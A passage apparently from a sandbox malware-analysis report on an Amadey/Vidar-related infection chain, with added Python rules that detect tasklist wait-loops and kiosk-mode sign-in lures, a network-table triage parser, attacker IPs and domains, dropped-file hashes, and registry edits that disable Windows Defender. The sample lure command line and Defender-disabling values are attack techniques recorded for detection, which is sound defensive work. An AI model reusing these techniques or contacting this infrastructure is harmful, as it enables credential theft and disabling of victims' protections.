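          r'"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk '
          '"https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" '
          "--no-default-browser-check --disable-popup-blocking"),
]


def find_wait_loops(events, min_polls=2):
    """Parents that repeatedly poll one PID with tasklist /fi "PID eq N" | find ":".

    find ":" only matches tasklist's "INFO: No tasks are running ..." line (the
    table printed for a live process contains no colon), so the loop ends once
    PID N has exited; the batch then runs its next stage and deletes itself.
    """
    polls = defaultdict(lambda: defaultdict(int))
    confirms = defaultdict(bool)
    for ev in events:
        m = PID_FILTER.search(ev.cmdline)
        if m and ev.name == "tasklist.exe":
            polls[ev.ppid][int(m.group(1))] += 1
        elif ev.name == "find.exe" and ev.cmdline.strip().lower() == 'find ":"':
            confirms[ev.ppid] = True
    by_pid = {ev.pid: ev for ev in events}
    findings = []
    for ppid, targets in polls.items():
        for target, n in targets.items():
            if n < min_polls or not confirms[ppid]:
                continue
            parent = by_pid.get(ppid)
            bat = SELF_DELETE_BAT.search(parent.cmdline) if parent else None
            findings.append({"parent_pid": ppid, "watched_pid": target, "polls": n,
                             "self_deleting_batch": bat.group(1) if bat else None})
    return findings


def find_kiosk_lures(events, window=8):
    """A browser started with --kiosk on a sign-in-looking URL shortly after the
    user's browsers were force-killed: the kill removes the real session and the
    borderless kiosk window is all the victim sees."""
    findings = []
    for i, ev in enumerate(events):
        m = KIOSK_URL.search(ev.cmdline) if ev.name in BROWSERS else None
        if not m:
            continue
        url = m.group(1)
        killed = [k.group(1).lower()
                  for k in (TASKKILL.search(p.cmdline) for p in events[max(0, i - window):i])
                  if k and k.group(1).lower() in BROWSERS]
        findings.append({"pid": ev.pid, "url": url, "browsers_killed": killed,
                         "signin_lure": bool(LURE_WORDS.search(url))})
    return findings


if __name__ == "__main__":
    for finding in find_wait_loops(SAMPLE_EVENTS) + find_kiosk_lures(SAMPLE_EVENTS):
        print(finding)
```

Both rules key on parent/child relationships rather than on file names, since the dropped executables here carry random names. Note that two of the dropped binaries were being handled by WerFault in the listing (`-p 2736` and `-p 3632`), so only the stages that ran to completion in this detonation are represented in the behaviour above.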

Network

Country Destination Domain Proto
RU 176.113.115.6:80 176.113.115.6 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 joyfulhezart.tech udp
US 8.8.8.8:53 hardswarehub.today udp
US 8.8.8.8:53 gadgethgfub.icu udp
US 8.8.8.8:53 hardrwarehaven.run udp
US 8.8.8.8:53 techmindzs.live udp
US 8.8.8.8:53 codxefusion.top udp
US 104.21.69.194:443 codxefusion.top tcp
US 104.21.69.194:443 codxefusion.top tcp
US 104.21.69.194:443 codxefusion.top tcp
US 8.8.8.8:53 biochextryhub.bet udp
US 172.67.192.128:443 biochextryhub.bet tcp
US 8.8.8.8:53 circujitstorm.bet udp
US 8.8.8.8:53 explorebieology.run udp
US 8.8.8.8:53 moderzysics.top udp
US 104.21.9.123:443 moderzysics.top tcp
DE 5.75.210.149:443 tcp
DE 5.75.210.149:443 tcp
US 8.8.8.8:53 dawtastream.bet udp
CH 185.208.156.162:80 185.208.156.162 tcp
US 8.8.8.8:53 foresctwhispers.top udp
US 8.8.8.8:53 tracnquilforest.life udp
US 8.8.8.8:53 collapimga.fun udp
US 8.8.8.8:53 seizedsentec.online udp
US 8.8.8.8:53 strawpeasaen.fun udp
US 8.8.8.8:53 quietswtreams.life udp
US 8.8.8.8:53 starrynsightsky.icu udp
US 8.8.8.8:53 earthsymphzony.today udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 farmingtzricks.top udp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 172.67.220.226:443 farmingtzricks.top tcp
US 185.199.111.133:443 raw.githubusercontent.com tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 cobolrationumelawrtewarms.com udp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
US 8.8.8.8:53 t.me udp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
GB 104.82.234.109:443 steamcommunity.com tcp
DE 5.75.210.83:443 5.75.210.83 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
DE 5.75.210.83:443 5.75.210.83 tcp
LU 45.59.120.8:80 45.59.120.8 tcp
RU 176.113.115.7:80 176.113.115.7 tcp
US 8.8.8.8:53 croprojegies.run udp
US 104.21.64.1:443 croprojegies.run tcp
RU 45.93.20.28:80 45.93.20.28 tcp
N/A 127.0.0.1:49884 tcp
US 8.8.8.8:53 spocs.getpocket.com udp
US 8.8.8.8:53 getpocket.cdn.mozilla.net udp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.ads.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 firefox-settings-attachments.cdn.mozilla.net udp
US 34.120.5.221:443 getpocket.cdn.mozilla.net tcp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.107.152.202:443 attachments.prod.remote-settings.prod.webservices.mozgcp.net tcp
US 8.8.8.8:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.pocket.prod.cloudops.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 prod.content-signature-chains.prod.webservices.mozgcp.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
US 8.8.8.8:53 shavar.prod.mozaws.net udp
GB 142.250.187.206:443 youtube.com tcp
US 8.8.8.8:53 youtube.com udp
US 8.8.8.8:53 youtube.com udp
GB 142.250.187.206:443 youtube.com udp
US 8.8.8.8:53 www.youtube.com udp
GB 172.217.169.46:443 www.youtube.com tcp
US 8.8.8.8:53 youtube-ui.l.google.com udp
US 8.8.8.8:53 youtube-ui.l.google.com udp
GB 172.217.169.46:443 youtube-ui.l.google.com udp
US 8.8.8.8:53 consent.youtube.com udp
GB 216.58.213.14:443 consent.youtube.com tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
GB 216.58.213.14:443 consent.youtube.com udp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com tcp
US 8.8.8.8:53 www.google.com udp
US 8.8.8.8:53 www.google.com udp
GB 216.58.204.68:443 www.google.com udp
N/A 127.0.0.1:49892 tcp
US 8.8.8.8:53 consent.youtube.com udp
US 8.8.8.8:53 consent.youtube.com udp
US 104.21.9.123:443 moderzysics.top tcp
RU 176.113.115.7:80 176.113.115.7 tcp
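The table mixes three kinds of rows: DNS lookups to 8.8.8.8:53, connections to a resolved hostname, and connections straight to an IP with no hostname (the Domain column is then blank or repeats the IP). Most of the Mozilla, Google and YouTube rows are what the kiosk-mode Firefox launch fetches on its own, and many of the `.top`/`.bet`/`.icu` names are queried but never connected to. The parser below is added here and is not part of the report; its rows are constructed from a handful of lines in the table, and the list of hostnames it treats as browser noise is an assumption for this example, not a verdict from the report.

```python
"""Triage of the sandbox network table.

Added example, not part of the report. SAMPLE_TABLE is constructed from lines
in the table above; NOISE_SUFFIXES is an assumption (hostnames the kiosk-mode
Firefox launch contacts by itself), not a classification from the report.
"""
import ipaddress
from collections import defaultdict

RESOLVER = "8.8.8.8:53"
NOISE_SUFFIXES = ("mozilla.net", "mozgcp.net", "mozaws.net", "getpocket.com",
                  "youtube.com", "google.com")

SAMPLE_TABLE = """
RU 176.113.115.6:80 176.113.115.6 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.111.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 joyfulhezart.tech udp
US 8.8.8.8:53 codxefusion.top udp
US 104.21.69.194:443 codxefusion.top tcp
US 104.21.69.194:443 codxefusion.top tcp
DE 5.75.210.149:443 tcp
US 8.8.8.8:53 youtube.com udp
GB 142.250.187.206:443 youtube.com tcp
US 8.8.8.8:53 prod.remote-settings.prod.webservices.mozgcp.net udp
N/A 127.0.0.1:49884 tcp
NL 107.189.27.66:80 cobolrationumelawrtewarms.com tcp
"""


def _is_ip(text):
    try:
        ipaddress.ip_address(text)
        return True
    except ValueError:
        return False


def parse_row(line):
    """Rows are 'CC dest:port [domain] proto'. The domain column is absent for
    raw-IP connections and sometimes just repeats the IP, which means the same."""
    parts = line.split()
    if len(parts) == 3:
        country, dest, proto = parts
        domain = None
    elif len(parts) == 4:
        country, dest, domain, proto = parts
    else:
        raise ValueError(f"unexpected row: {line!r}")
    if domain is not None and _is_ip(domain):
        domain = None
    return {"country": country, "dest": dest, "domain": domain, "proto": proto.lower()}


def is_noise(domain):
    return any(domain == s or domain.endswith("." + s) for s in NOISE_SUFFIXES)


def triage(table):
    """Split rows into direct-IP connections, hostname connections, and names that
    were only resolved (fallback domains that never answered or were not tried)."""
    queried, contacted, direct_ip, noise = set(), defaultdict(set), set(), 0
    for line in table.strip().splitlines():
        row = parse_row(line)
        if row["dest"] == RESOLVER and row["proto"] == "udp":
            if row["domain"] is None:
                continue
            if is_noise(row["domain"]):
                noise += 1
            else:
                queried.add(row["domain"])
            continue
        host = row["dest"].rsplit(":", 1)[0]
        if ipaddress.ip_address(host).is_loopback:
            continue
        if row["domain"] is None:
            direct_ip.add(row["dest"])
        elif is_noise(row["domain"]):
            noise += 1
        else:
            contacted[row["domain"]].add(row["dest"])
    return {
        "direct_ip": sorted(direct_ip),
        "contacted": {d: sorted(p) for d, p in sorted(contacted.items())},
        "dns_only": sorted(queried - set(contacted)),
        "noise_rows": noise,
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_TABLE).items():
        print(key, value)
```

Plain-HTTP connections straight to an IP (port 80, no hostname) are the rows to block first; hostnames behind Cloudflare addresses (104.21.x.x, 172.67.x.x) should be blocked by name, since the IP is shared. Treat raw.githubusercontent.com as a payload host to investigate by path, not as noise: the report flags a downloaded MZ/PE file. The DNS-only list is worth keeping as well; a short detonation only exercises the first domains that resolve.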

Files

memory/2160-0-0x0000000000CD0000-0x000000000117B000-memory.dmp

memory/2160-1-0x0000000077400000-0x0000000077402000-memory.dmp

memory/2160-2-0x0000000000CD1000-0x0000000000CFF000-memory.dmp

memory/2160-3-0x0000000000CD0000-0x000000000117B000-memory.dmp

memory/2160-4-0x0000000000CD0000-0x000000000117B000-memory.dmp

memory/2160-5-0x0000000000CD0000-0x000000000117B000-memory.dmp

\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe

MD5 4cf553af549bd99fa44da57de08620a8
SHA1 67e04f4434f0a63b082b0c8f148f5c100a77e27f
SHA256 d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e
SHA512 4ac6fae3a8aeda3a8a0e01d0e59385f674b72ccea57586b007a1a65e810c4063f2ea85a62f002b9fe522c2a986ae7faf2e0f3f5cb5cc5ccbd2a58851df7b2186

memory/2668-18-0x0000000000330000-0x00000000007DB000-memory.dmp

memory/2160-16-0x0000000007410000-0x00000000078BB000-memory.dmp

memory/2160-15-0x0000000000CD0000-0x000000000117B000-memory.dmp

memory/2668-19-0x0000000000331000-0x000000000035F000-memory.dmp

memory/2668-20-0x0000000000330000-0x00000000007DB000-memory.dmp

memory/2668-22-0x0000000000330000-0x00000000007DB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe

MD5 5b3ed060facb9d57d8d0539084686870
SHA1 9cae8c44e44605d02902c29519ea4700b4906c76
SHA256 7c711ab33a034ed733b18b76a0154c56065c74a9481cbd0e4f65aa2b03c8a207
SHA512 6733ae1c74c759031fb2de99beb938f94fc77ed8cc3b42b2b1d24a597f9e74eeab5289f801407619485f81fccaa55546344773e9a71b40b1af6b3c767b69e71a

C:\Users\Admin\AppData\Local\Temp\2EED.tmp\2EEE.tmp\2EEF.bat

MD5 3895cb9413357f87a88c047ae0d0bd40
SHA1 227404dd0f7d7d3ea9601eecd705effe052a6c91
SHA256 8140df06ebcda4d8b85bb00c3c0910efc14b75e53e7a1e4f7b6fa515e4164785
SHA512 a886081127b4888279aba9b86aa50a74d044489cf43819c1dea793a410e39a62413ceb7866f387407327b348341b2ff03cbe2430c57628a5e5402447d3070ca1

memory/2616-43-0x000000001B6B0000-0x000000001B992000-memory.dmp

memory/2616-45-0x0000000001E80000-0x0000000001E88000-memory.dmp

memory/2668-44-0x0000000000330000-0x00000000007DB000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 cebf2b3e5d40ad431f50441119b70dbb
SHA1 1c96802eaf2a39fc9d5e3677beddf68aad829df2
SHA256 b842462014209ac29af76b937c305d3dcb75581155ad1a41e3b3e6fc0eebbe14
SHA512 ac690fd5b4192540c544d8cec9b30c831faef51275b6607f9b6a2c5586b1ea51acd06c1b184051345701f163729000f10e497687f9dbfcf1e246bf5420e6024c

memory/1504-52-0x0000000001F40000-0x0000000001F48000-memory.dmp

memory/1504-51-0x000000001B700000-0x000000001B9E2000-memory.dmp

memory/2668-53-0x0000000000330000-0x00000000007DB000-memory.dmp

memory/2668-54-0x0000000000330000-0x00000000007DB000-memory.dmp

memory/2668-55-0x0000000000330000-0x00000000007DB000-memory.dmp

memory/2668-56-0x0000000000330000-0x00000000007DB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10106910101\ktxzLhN.exe

MD5 35a4dfb5f0308d20b1e5bf26e0a70509
SHA1 0c72b35b74dadbce4a95c034968913de271aae06
SHA256 40d3baeb6df3e2cd4eed207e773b21989b86ef547de12a748529c2b559025339
SHA512 51b8bf5583a256015daaa8caa9c9868c792ef4a1157b89a6880b365c4c5a1c7416abc2b1fcdde9d1d5d9bb7aaa1c617d5b34124a582ec042ac5a2afa064c60d9

memory/1488-69-0x00000000010C0000-0x0000000001FD4000-memory.dmp

memory/1488-70-0x000000001C280000-0x000000001CDE6000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\dll32.exe

MD5 ffb5c5f8bab4598fada3bbf92d02d66d
SHA1 ae8096c1f160c97874179ea878a61f69bfb9941a
SHA256 f3aa764be17f1a197f94b949cfd88f99c2d67e9fec1f53046ef1b6189f594da1
SHA512 902e8a95b964ef3a48504dcdb3c4f0615212eb942476ec26b88e02a39cbaaf866f3fcbe5cd4374342b80aae9a7e17092a28dbe1d53630493a0b0cee8152a4ccf

memory/2300-76-0x0000000000E60000-0x0000000001416000-memory.dmp

\Users\Admin\AppData\Local\Temp\Costura\05A92EC28EDC5561548638CAA951F864\64\sqlite.interop.dll

MD5 65ccd6ecb99899083d43f7c24eb8f869
SHA1 27037a9470cc5ed177c0b6688495f3a51996a023
SHA256 aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512 533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d

C:\Users\Admin\AppData\Local\Temp\10107200101\zY9sqWs.exe

MD5 2bb133c52b30e2b6b3608fdc5e7d7a22
SHA1 fcb19512b31d9ece1bbe637fe18f8caf257f0a00
SHA256 b8e02f2bc0ffb42e8cf28e37a26d8d825f639079bf6d948f8debab6440ee5630
SHA512 73229885f8bf4aace4671b819a8487f36acb7878cd309bdf80b998b0a63584f3063364d192b1fc26fa71b9664908fe290a00f6898350c30f40d5f2a2d2efe51f

memory/2668-97-0x0000000000330000-0x00000000007DB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107211121\PcAIvJ0.cmd

MD5 c203adcd3b4b1717be1e79d7d234f89c
SHA1 a0c726c32766f5d3e3de1bdc9998da2bb2a657e4
SHA256 bc953bccc3974ff2a40fd6ce700e499d11bfd2463014786a4cb0f7bac6568ad8
SHA512 724f920d5e5f31155629155184a1ccf6299c72da04362062512c154e27bed136292a0af51f423e8e05d8f80426b72f679a01ab9662d4da6ffc06cfcbcd005368

C:\Users\Admin\AppData\Local\Temp\10107220101\v6Oqdnc.exe

MD5 6006ae409307acc35ca6d0926b0f8685
SHA1 abd6c5a44730270ae9f2fce698c0f5d2594eac2f
SHA256 a5fa1579a8c1a1d4e89221619d037b6f8275f34546ed44a020f5dfcee3710f0b
SHA512 b2c47b02c972f63915e2e45bb83814c7706b392f55ad6144edb354c7ee309768a38528af7fa7aeadb5b05638c0fd55faa734212d3a657cd08b7500838135e718

memory/2668-113-0x0000000000330000-0x00000000007DB000-memory.dmp

memory/2668-121-0x0000000006940000-0x0000000006DDB000-memory.dmp

memory/1040-124-0x0000000000CA0000-0x000000000113B000-memory.dmp

memory/2668-123-0x0000000006940000-0x0000000006DDB000-memory.dmp

memory/1040-129-0x0000000000CA0000-0x000000000113B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107230101\MCxU5Fj.exe

MD5 641525fe17d5e9d483988eff400ad129
SHA1 8104fa08cfcc9066df3d16bfa1ebe119668c9097
SHA256 7a87b801af709e8e510140f0f9523057793e7883ec2b6a4eab90fcf0ec20fd4a
SHA512 ee92bc34e21bb68aeda20b237e8b8e27f95e4cc44f5fd9743b52079c40f193cc342f8bb2690fd7ab3624e1690979118bd2e00a46bda3052cbd76bc379b87407e

memory/2752-143-0x0000000000030000-0x00000000000A0000-memory.dmp

memory/2608-150-0x0000000000400000-0x0000000000466000-memory.dmp

memory/2608-159-0x0000000000400000-0x0000000000466000-memory.dmp

memory/2608-158-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2608-161-0x0000000000400000-0x0000000000466000-memory.dmp

memory/2608-156-0x0000000000400000-0x0000000000466000-memory.dmp

memory/2608-154-0x0000000000400000-0x0000000000466000-memory.dmp

memory/2608-152-0x0000000000400000-0x0000000000466000-memory.dmp

memory/2608-148-0x0000000000400000-0x0000000000466000-memory.dmp

memory/2668-167-0x0000000006940000-0x0000000006DDB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107240101\ce4pMzk.exe

MD5 d39df45e0030e02f7e5035386244a523
SHA1 9ae72545a0b6004cdab34f56031dc1c8aa146cc9
SHA256 df468fc510aec82c827987f54b824b978dd71301f93d18d71e704727d6dfdfa2
SHA512 69866ba5b53d1183a0899e3d22ff06111ae2e8df429beeb853c89f3ed0afb015dd4139b1c507566ffb0fe171a4ff1b318247b7a568dc492d9f71266f5c848a64

memory/2668-183-0x0000000006940000-0x0000000006DDB000-memory.dmp

memory/2324-186-0x00000000013B0000-0x00000000013C2000-memory.dmp

memory/2324-187-0x0000000000350000-0x0000000000360000-memory.dmp

memory/2668-188-0x0000000000330000-0x00000000007DB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107250101\mAtJWNv.exe

MD5 b60779fb424958088a559fdfd6f535c2
SHA1 bcea427b20d2f55c6372772668c1d6818c7328c9
SHA256 098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221
SHA512 c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f

memory/2052-205-0x0000000000E30000-0x0000000000E90000-memory.dmp

memory/2044-208-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2044-212-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2044-222-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2044-225-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2044-224-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

memory/2044-220-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2044-218-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2044-216-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2044-214-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2044-210-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2044-230-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2668-233-0x0000000000330000-0x00000000007DB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmp2961.tmp.bat

MD5 16b0f1ff4a568e2eaee5bc0f74b225ae
SHA1 e93ca407f192f3394e62853508b47beaf69d4fb1
SHA256 10ca88c5fa2dd89389b1e69c3f70f7b08342fd4e6771de4a9b888ef74f37b1a9
SHA512 d2c6241b0613d3f7bb7a47de97def1efffb0cc848aceb07b08131ba13f743299c5ef9b623a940d11d2c7dd68892cd85ecfb65c2c1b58d92db92221eb5548c118

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/2780-244-0x000000001B5C0000-0x000000001B8A2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107260101\SvhQA35.exe

MD5 9da08b49cdcc4a84b4a722d1006c2af8
SHA1 7b5af0630b89bd2a19ae32aea30343330ca3a9eb
SHA256 215a9d61105d1ada2b22fbf70e58745cabfff72b93d95aae1ce20bbc6defa6dd
SHA512 579dcb0c2f0af9a97a9c75caf023f375bd93f1698678393e7315360a33f432f2d727bf14b22c8b1584c628582115462bdd0c3edaacdcaec8fd691595e6b5bfdb

\Users\Admin\AppData\Local\Temp\onefile_1616_133856873851862000\chromium.exe

MD5 0eb68c59eac29b84f81ad6522d396f59
SHA1 aacfdf3cb1bdd995f63584f31526b11874fc76a5
SHA256 dfa74d5d729e90be6e72b3c811a1299abbc52a1f6d347f011101fb5f719d059f
SHA512 81ee88577d9b665d90bc846aa249c9533aaeed2b7259d15981fcc1686723fe11343b682be25cfa3542117c8a805e40343a7315a69e7204829cbf70f22cca25e7

C:\Users\Admin\AppData\Local\Temp\onefile_1616_133856873851862000\python312.dll

MD5 166cc2f997cba5fc011820e6b46e8ea7
SHA1 d6179213afea084f02566ea190202c752286ca1f
SHA256 c045b57348c21f5f810bae60654ae39490846b487378e917595f1f95438f9546
SHA512 49d9d4df3d7ef5737e947a56e48505a2212e05fdbcd7b83d689639728639b7fd3be39506d7cfcb7563576ebee879fd305370fdb203909ed9b522b894dd87aacb

memory/2668-322-0x0000000000330000-0x00000000007DB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107270101\FvbuInU.exe

MD5 f155a51c9042254e5e3d7734cd1c3ab0
SHA1 9d6da9f8155b47bdba186be81fb5e9f3fae00ccf
SHA256 560c7869df511c5ea54f20be704bbda02e1623d0867333a90ac3783d29eae7af
SHA512 67ec5546d96e83a3c6f4197a50812f585b96b4f34a2b8d77503b51cddd4ea5a65d5416c3efc427a5e58119fa068125987e336efb2dfd5811fe59145aa5f5bd6a

memory/2668-335-0x0000000006940000-0x0000000006DE1000-memory.dmp

memory/2668-336-0x0000000006940000-0x0000000006DE1000-memory.dmp

memory/1640-337-0x0000000000EB0000-0x0000000001351000-memory.dmp

memory/3056-338-0x000000013F550000-0x0000000140B9B000-memory.dmp

memory/1616-399-0x000000013F8A0000-0x0000000140441000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 83142242e97b8953c386f988aa694e4a
SHA1 833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256 d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512 bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

C:\Users\Admin\AppData\Local\Temp\Tar7288.tmp

MD5 109cab5505f5e065b63d01361467a83b
SHA1 4ed78955b9272a9ed689b51bf2bf4a86a25e53fc
SHA256 ea6b7f51e85835c09259d9475a7d246c3e764ad67c449673f9dc97172c351673
SHA512 753a6da5d6889dd52f40208e37f2b8c185805ef81148682b269fff5aa84a46d710fe0ebfe05bce625da2e801e1c26745998a41266fa36bf47bc088a224d730cc

memory/2668-453-0x0000000006940000-0x0000000006DE1000-memory.dmp

memory/2668-443-0x0000000000330000-0x00000000007DB000-memory.dmp

memory/1640-467-0x0000000000EB0000-0x0000000001351000-memory.dmp

memory/2668-468-0x0000000006940000-0x0000000006DE1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107280101\Ps7WqSx.exe

MD5 dab2bc3868e73dd0aab2a5b4853d9583
SHA1 3dadfc676570fc26fc2406d948f7a6d4834a6e2c
SHA256 388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb
SHA512 3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8

memory/2668-481-0x0000000006940000-0x000000000702E000-memory.dmp

memory/2668-482-0x0000000006940000-0x000000000702E000-memory.dmp

memory/2012-483-0x0000000001190000-0x000000000187E000-memory.dmp

memory/2800-493-0x00000000000F0000-0x0000000001004000-memory.dmp

memory/2668-494-0x0000000000330000-0x00000000007DB000-memory.dmp

memory/2668-495-0x0000000006940000-0x000000000702E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe

MD5 73636685f823d103c54b30bc457c7f0d
SHA1 597dba03dce00cf6d30b082c80c8f9108ae90ccf
SHA256 1edc123e5a8ea5ce814e2759ee38453404d4af72a3577b0af55e8d99fa38ef1c
SHA512 183d4901a72afc044ef13c3a2cc21f93aefd954665f981c7886afc9019ca7d46f76b3459789dff5721542f2f9e7bbf606d7df68328e772e4c66dc789964f43f7

memory/2012-513-0x0000000001190000-0x000000000187E000-memory.dmp

C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe

MD5 1dc908064451d5d79018241cea28bc2f
SHA1 f0d9a7d23603e9dd3974ab15400f5ad3938d657a
SHA256 d521f17349128cc6339aecb7a5e41f91ab02d338e5c722cd809d96c3a1c64454
SHA512 6f072459376181f7ddb211cf615731289706e7d90b7c81e306c6cd5c79311544d0b4be946791ae4fad3c2c034901bc0a2fd5b2a710844e3fe928a92d1cc0814f

memory/2308-607-0x00000000045B0000-0x00000000049F0000-memory.dmp

memory/2308-608-0x00000000045B0000-0x00000000049F0000-memory.dmp

memory/2844-609-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2668-610-0x0000000000330000-0x00000000007DB000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107370101\460d9c14c9.exe

MD5 7c169698effcdd45b7cbd763d28e87f5
SHA1 4f9db666d66255cd7ca2b0973ff00eae8b155f7a
SHA256 c7fd445ebedd5cfa9a01daccc7c5771a88f1719b6dbfe16c9f0334fc4371250b
SHA512 58335071c6f27e72c8cd505859c9b122ff354395b239697311c1ce17f224c58dd9e2894fbc874c835866a299b3ae9ffab767195a253698fed0d39f3fb15ff8e3

memory/2668-626-0x0000000006940000-0x0000000006C53000-memory.dmp

memory/2668-625-0x0000000006940000-0x0000000006C53000-memory.dmp

memory/2736-627-0x0000000000B90000-0x0000000000EA3000-memory.dmp

memory/2308-628-0x00000000045B0000-0x00000000049F0000-memory.dmp

memory/2844-630-0x0000000000400000-0x0000000000840000-memory.dmp

memory/2308-629-0x00000000045B0000-0x00000000049F0000-memory.dmp

memory/2844-631-0x0000000000400000-0x0000000000840000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10107380101\69c80032ec.exe

MD5 2012699a5e85cd283323c324aa061bc7

Analysis: behavioral2

Detonation Overview

Submitted

2025-03-05 22:28

Reported

2025-03-05 22:30

Platform

win10v2004-20250217-en

Max time kernel

146s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d6944e2ab44b46b6372ca55e6742c3d9252718ba2bedb2aca38c96026d10570e.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

Detect Vidar Stealer

stealer

Detect Xworm Payload

Detects Healer an antivirus disabler dropper

Healer

dropper healer

Healer family

healer

LiteHTTP

stealer bot litehttp

Litehttp family

litehttp

Modifies Windows Defender DisableAntiSpyware settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A

Modifies Windows Defender Real-time Protection settings

defense_evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\10107400101\8809d7d07b.exe N/A
